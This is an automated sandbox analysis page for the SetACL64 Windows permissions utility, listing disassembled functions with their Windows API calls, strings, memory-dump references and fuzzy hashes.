Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: AllocString$DescriptorSecurityValid_invalid_parameter_noinfo_noreturn
String ID: GetSD$SetSD$__systemsecurity$__systemsecurity=@$t5x$$x$2z$w
API String ID: 1218313072-3940533286
Opcode ID: 573fd55f4af3a90e586db8418e43b378526fcc2e4e962f79aabb54a16630bbf7
Instruction ID: ba59e4822b8f7e0d739b1f9ad255a7081441f27c13268fab4cf684876211e9fb
Opcode Fuzzy Hash: 573fd55f4af3a90e586db8418e43b378526fcc2e4e962f79aabb54a16630bbf7
Instruction Fuzzy Hash: C2F148B2A09B46C6EB14DF65E49836963A4FF88B84F044539DA4E83794DF3EE854C360

Function 00007FF6868342A0 Relevance: 38.8, APIs: 18, Strings: 4, Instructions: 286COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF6868342DA
OpenProcessToken.ADVAPI32 ref: 00007FF6868342EC
GetLastError.KERNEL32 ref: 00007FF6868342F6
LookupPrivilegeValueW.ADVAPI32 ref: 00007FF68683431F
GetLastError.KERNEL32 ref: 00007FF686834329
CloseHandle.KERNEL32 ref: 00007FF686834336
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68683471E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68683472A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686834730
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686834736
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68683473C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686834742
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686834748

Strings

Enabling, xrefs: 00007FF6868343BE
the privilege , xrefs: 00007FF686834412
SetPrivilege, xrefs: 00007FF6868344D9
failed with: , xrefs: 00007FF68683447D

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ErrorLastProcess$CloseCurrentHandleLookupOpenPrivilegeTokenValue
String ID: failed with: $ the privilege $Enabling$SetPrivilege
API String ID: 152255395-1151176482
Opcode ID: 98658c3223ea42c8e2fd826e98f666b88e57f772a3a703dd5e8032af214ad707
Instruction ID: c994697dadc82ef0e5c6273f79f15f31f67f46c5af6bb4a3791a1a7547b2fd98
Opcode Fuzzy Hash: 98658c3223ea42c8e2fd826e98f666b88e57f772a3a703dd5e8032af214ad707
Instruction Fuzzy Hash: 75D191A2B18B46C5FB008B65D5893AD2361FF857A8F504239DB5D97AE9DF3DE880C310

Function 00007FF68683BF60 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 267librarymemorywindowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF68683BFCE
#13.ACTIVEDS ref: 00007FF68683C132
SysStringByteLen.OLEAUT32 ref: 00007FF68683C196
SysAllocStringByteLen.OLEAUT32 ref: 00007FF68683C1A2
SysFreeString.OLEAUT32 ref: 00007FF68683C1FA
LoadLibraryExW.KERNEL32 ref: 00007FF68683C241
LoadLibraryExW.KERNEL32 ref: 00007FF68683C285
FormatMessageW.KERNEL32 ref: 00007FF68683C2C4
LocalFree.KERNEL32 ref: 00007FF68683C2FA
FreeLibrary.KERNEL32 ref: 00007FF68683C30D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68683C38A

Strings

netmsg.dll, xrefs: 00007FF68683C23A
pdh.dll, xrefs: 00007FF68683C27E

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: FreeLibraryString$ByteLoad$AllocErrorFormatLastLocalMessage_invalid_parameter_noinfo_noreturn
String ID: netmsg.dll$pdh.dll
API String ID: 40273658-131213443
Opcode ID: 509bcff9dc41729db223f1edf4d17637db7f3b14702afe9ed8d969c13de03bd2
Instruction ID: 04136fc9a9407f5c55d33a64320f1109f2c662dc5bb357685144d01604869850
Opcode Fuzzy Hash: 509bcff9dc41729db223f1edf4d17637db7f3b14702afe9ed8d969c13de03bd2
Instruction Fuzzy Hash: DEB1D2B2A08746C6EB108B15E9443AE33A1FF44BA8F504639DA5D87BE4DF3EE841C750

Function 00007FF6868580F6 Relevance: 13.6, APIs: 9, Instructions: 137COMMON

Download Yara Rule

APIs

SetSecurityDescriptorOwner.ADVAPI32 ref: 00007FF6868580FD
SetSecurityDescriptorGroup.ADVAPI32 ref: 00007FF686858116
SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF686858133
SetSecurityDescriptorSacl.ADVAPI32 ref: 00007FF686858154
GetLastError.KERNEL32 ref: 00007FF686858162
MakeSelfRelativeSD.ADVAPI32 ref: 00007FF6868581EE
MakeSelfRelativeSD.ADVAPI32 ref: 00007FF68685820E
GetLastError.KERNEL32 ref: 00007FF68685821C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685834B

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: DescriptorSecurity$ErrorLastMakeRelativeSelf$DaclGroupOwnerSacl_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3822310168-0
Opcode ID: 1a143b5dc0866976304182db4d08a821830a9c3d75e33f02e80d987c8124c854
Instruction ID: 6ed027d63a938547275d5e075d188594240d612477da603a5610b0b01c290ded
Opcode Fuzzy Hash: 1a143b5dc0866976304182db4d08a821830a9c3d75e33f02e80d987c8124c854
Instruction Fuzzy Hash: 3F515BE2A19A52C5FB14DF61D8593792361BF80B84F44403ACB6E8B6A5DF2EEC51C360

Function 00007FF686877674 Relevance: 10.7, APIs: 7, Instructions: 171COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF686873E64: GetLastError.KERNEL32(?,?,?,00007FF6868699DD), ref: 00007FF686873E73
Part of subcall function 00007FF686873E64: SetLastError.KERNEL32(?,?,?,00007FF6868699DD), ref: 00007FF686873F11

EnumSystemLocalesW.KERNEL32(?,00000000,00000092,?,?,00000000,?,00007FF68686966D), ref: 00007FF6868777CB
GetUserDefaultLCID.KERNEL32(?,00000000,00000092,?), ref: 00007FF6868777E4
ProcessCodePage.LIBCMT ref: 00007FF68687780E
IsValidCodePage.KERNEL32 ref: 00007FF686877820
IsValidLocale.KERNEL32 ref: 00007FF686877836
GetLocaleInfoW.KERNEL32 ref: 00007FF686877892
GetLocaleInfoW.KERNEL32 ref: 00007FF6868778AE

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
String ID:
API String ID: 3939093798-0
Opcode ID: c1a13ead2e16a132016a420d339e8d407b4230b911f8cc16b805d80e8827ded2
Instruction ID: 1d3b5c8ac1dca7daee6ef65360d98367d3b4a3d70d3eb90fea62f5fa90e3d57f
Opcode Fuzzy Hash: c1a13ead2e16a132016a420d339e8d407b4230b911f8cc16b805d80e8827ded2
Instruction Fuzzy Hash: 8D714BA2F09656CAFB109B64D8506B923B0BF48B84F444139CF1D97795EF3EAC45C760

Function 00007FF686862E8C Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF686862EA8
RtlCaptureContext.NTDLL ref: 00007FF686862ED5
RtlLookupFunctionEntry.NTDLL ref: 00007FF686862EEF
RtlVirtualUnwind.NTDLL ref: 00007FF686862F30
IsDebuggerPresent.KERNEL32 ref: 00007FF686862F84
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF686862FA5
UnhandledExceptionFilter.KERNEL32 ref: 00007FF686862FB0

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: b089a036664126cd0b55730891b2820b0630cf2b127659524579cdc58d050a6c
Instruction ID: 8ff20698835a8c6f7262d9185f252a790125d09e07a7b596757fc9f8cb0dee2a
Opcode Fuzzy Hash: b089a036664126cd0b55730891b2820b0630cf2b127659524579cdc58d050a6c
Instruction Fuzzy Hash: F4313CB2618B86CAEB609F60E8543EE6365FB84744F44403ADB4D87B99DF3DD948C720

Function 00007FF68687C76C Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF68687C7B5

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c7e3b804aa443ecddc5aa38c83e1479257d163bfb5c256670d9298fc1dc11c8a
Instruction ID: 678695c2bb4fff7f16deece579002792e3f0b85fb940d855dec450c5c7193d32
Opcode Fuzzy Hash: c7e3b804aa443ecddc5aa38c83e1479257d163bfb5c256670d9298fc1dc11c8a
Instruction Fuzzy Hash: 52A1E6A2B18685C5EA60CB2694047BAA3B0FF94BD4F54413AEE5D87B94DF3ED845C310

Function 00007FF6868686C8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00007FF686868741
RtlLookupFunctionEntry.NTDLL ref: 00007FF686868759
RtlVirtualUnwind.NTDLL ref: 00007FF686868794
IsDebuggerPresent.KERNEL32 ref: 00007FF6868687CD
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6868687D7
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6868687E2

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 0c75d53fa4f789302832d1f0c4a661b2f4dd75274d5b0a99b56319323675b894
Instruction ID: 0519872dc2e542c435bd10d72e65dccfe74f569aa60f8bf346e66bc1817e7c3c
Opcode Fuzzy Hash: 0c75d53fa4f789302832d1f0c4a661b2f4dd75274d5b0a99b56319323675b894
Instruction Fuzzy Hash: D2316072618B81C6DB608B25E8442AE73A4FF88754F540139EB8D87B65EF3DD945C710

Function 00007FF68687DFF0 Relevance: 7.8, APIs: 5, Instructions: 320fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32 ref: 00007FF68687E05F
WriteFile.KERNEL32 ref: 00007FF68687E309
WriteFile.KERNEL32 ref: 00007FF68687E35B
GetLastError.KERNEL32 ref: 00007FF68687E49D
GetLastError.KERNEL32 ref: 00007FF68687E4AF

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: ErrorFileLastWrite$Console
String ID:
API String ID: 786612050-0
Opcode ID: 595654060b954cd898e70031aa38deb9f7488c276e60d446b525d1db4710fac2
Instruction ID: ff7280bfbe60e71b4dff526b95f8117112dbe8bc9b391f59b8a4e78f516cb713
Opcode Fuzzy Hash: 595654060b954cd898e70031aa38deb9f7488c276e60d446b525d1db4710fac2
Instruction Fuzzy Hash: EED1E0B2B08A81CAE710CF65E4881ED77B1FB45798F14413ADE4E87B99DE3AD419C310

Function 00007FF68685C250 Relevance: 7.8, APIs: 5, Instructions: 305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e81314747b826c716fa44dea94a216081fde13e1c2a81abd4463a414bef4ca2a
Instruction ID: e5a623606f543a1cbf02e189caeeeb163fd3f54282a995fa222b6af2c775d156
Opcode Fuzzy Hash: e81314747b826c716fa44dea94a216081fde13e1c2a81abd4463a414bef4ca2a
Instruction Fuzzy Hash: 4EB1C0B2A18B41C1EB109B25E44936E63A1FF48BD8F404139DB8D87B99DF7EE990C750

Function 00007FF686834810 Relevance: 7.6, APIs: 5, Instructions: 105COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF68683FCA1), ref: 00007FF686834859
LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF68683FCA1), ref: 00007FF68683486D
LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF68683FCA1), ref: 00007FF686834882
FreeResource.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF68683FCA1), ref: 00007FF686834964

Part of subcall function 00007FF6868349B0: VerQueryValueW.VERSION ref: 00007FF686834A5F

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868349A5

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: Resource$FindFreeLoadLockQueryValue_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 678723381-0
Opcode ID: ccf424d7a3e64a52a3ff587554103de86ea84168affc70f79e39ce00dd8ec87e
Instruction ID: 7ba90ef05a520d13f77c55ab4759998f6c38476586eb46ada0c00af0494d935f
Opcode Fuzzy Hash: ccf424d7a3e64a52a3ff587554103de86ea84168affc70f79e39ce00dd8ec87e
Instruction Fuzzy Hash: 34419062A19B85C1EA108B24E64536A6361FF85BE4F144238EB9D46AAADF3DF580C710

Function 00007FF686877EB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF686877EE9
GetLocaleInfoW.KERNEL32(?,?,?,?,?,00007FF686869847), ref: 00007FF686877F17

Strings

GetLocaleInfoEx, xrefs: 00007FF686877EDD

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: InfoLocaletry_get_function
String ID: GetLocaleInfoEx
API String ID: 2200034068-2904428671
Opcode ID: 591c11f87c398ef623a2c4855596f7f13eeda1a7201aaa3cd71a990fcb1b3bf8
Instruction ID: 511a789b08861e2b8fbc949cae8397253d3dcc6b5e63fc27b615a04b9f34a030
Opcode Fuzzy Hash: 591c11f87c398ef623a2c4855596f7f13eeda1a7201aaa3cd71a990fcb1b3bf8
Instruction Fuzzy Hash: 6B01D1A0B08B42C6E7008B22B9404AAA371BF94BD0F58403ADF5C83B6ACF3DDD41C760

Function 00007FF6868770F4 Relevance: 4.7, APIs: 3, Instructions: 169COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF686873E64: GetLastError.KERNEL32(?,?,?,00007FF6868699DD), ref: 00007FF686873E73
Part of subcall function 00007FF686873E64: SetLastError.KERNEL32(?,?,?,00007FF6868699DD), ref: 00007FF686873F11

GetLocaleInfoW.KERNEL32 ref: 00007FF686877160

Part of subcall function 00007FF68687C558: _invalid_parameter_noinfo.LIBCMT ref: 00007FF68687C575

GetLocaleInfoW.KERNEL32 ref: 00007FF6868771A9

Part of subcall function 00007FF68687C558: _invalid_parameter_noinfo.LIBCMT ref: 00007FF68687C5CE

GetLocaleInfoW.KERNEL32 ref: 00007FF686877274

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: InfoLocale$ErrorLast_invalid_parameter_noinfo
String ID:
API String ID: 3644580040-0
Opcode ID: 625abfe8784ef31295fdbe92046a34f272b46dfe68fa632f601a46611a6647d6
Instruction ID: e4c8ba9832462bcca2d93dfbe98cd623b7fccbfa770d902293f0157f23ff1622
Opcode Fuzzy Hash: 625abfe8784ef31295fdbe92046a34f272b46dfe68fa632f601a46611a6647d6
Instruction Fuzzy Hash: E7617BB2B19642CAEB248F15E54167963B1FF88B40F448139DBAED3691DE3EED50C720

Function 00007FF686877340 Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF686873E64: GetLastError.KERNEL32(?,?,?,00007FF6868699DD), ref: 00007FF686873E73
Part of subcall function 00007FF686873E64: SetLastError.KERNEL32(?,?,?,00007FF6868699DD), ref: 00007FF686873F11

GetLocaleInfoW.KERNEL32 ref: 00007FF6868773A8

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 95196c644f9699b70877d59c2ca76c71c45bc80ef89ac16a2cac59d7183ffe7d
Instruction ID: 7e44a9fcefe949e3f3e7ae3111fefcf467d6aa2bfa6cda0a3344dc7fdee9bc99
Opcode Fuzzy Hash: 95196c644f9699b70877d59c2ca76c71c45bc80ef89ac16a2cac59d7183ffe7d
Instruction Fuzzy Hash: AB318BB2B09682C6EB249B25E4413BA62B1FF88784F408039DB5DC3695DE3EEC10C710

Function 00007FF686876F8C Relevance: 1.6, APIs: 1, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF686873E64: GetLastError.KERNEL32(?,?,?,00007FF6868699DD), ref: 00007FF686873E73
Part of subcall function 00007FF686873E64: SetLastError.KERNEL32(?,?,?,00007FF6868699DD), ref: 00007FF686873F11

EnumSystemLocalesW.KERNEL32(?,?,?,00007FF686877777,?,00000000,00000092,?,?,00000000,?,00007FF68686966D), ref: 00007FF68687702A

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 85ba5fa5f454a5613c73245898a5c2bac5f412ef3db99b679915ad1f55d47ee7
Instruction ID: 09fb33b9b7d71c7a90a6f8c77eee092e55df1b3708fe8840dc0698a03e00cd18
Opcode Fuzzy Hash: 85ba5fa5f454a5613c73245898a5c2bac5f412ef3db99b679915ad1f55d47ee7
Instruction Fuzzy Hash: EF11DFA3B08645CAEB148F29D0406AC7BB1FF90BA0F448139DA2D833C4DE6ADED1C750

Function 00007FF686877548 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF686873E64: GetLastError.KERNEL32(?,?,?,00007FF6868699DD), ref: 00007FF686873E73
Part of subcall function 00007FF686873E64: SetLastError.KERNEL32(?,?,?,00007FF6868699DD), ref: 00007FF686873F11

GetLocaleInfoW.KERNEL32(?,?,?,00007FF6868772F1), ref: 00007FF68687757F

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 49da2eb39f98338b10d953fea960edfff0511e9b01e2e80171c98adcd5d1bcf9
Instruction ID: 7eee0ab41360a8daa5f8ecec8c42408a5a794d04d5e910aaf62f8d230a25ee8e
Opcode Fuzzy Hash: 49da2eb39f98338b10d953fea960edfff0511e9b01e2e80171c98adcd5d1bcf9
Instruction Fuzzy Hash: 3B1106B2B1D696C2EB649B12B04167A23B1FF40B64F105239EB2D876C4DE3AEC81C750

Function 00007FF68687705C Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

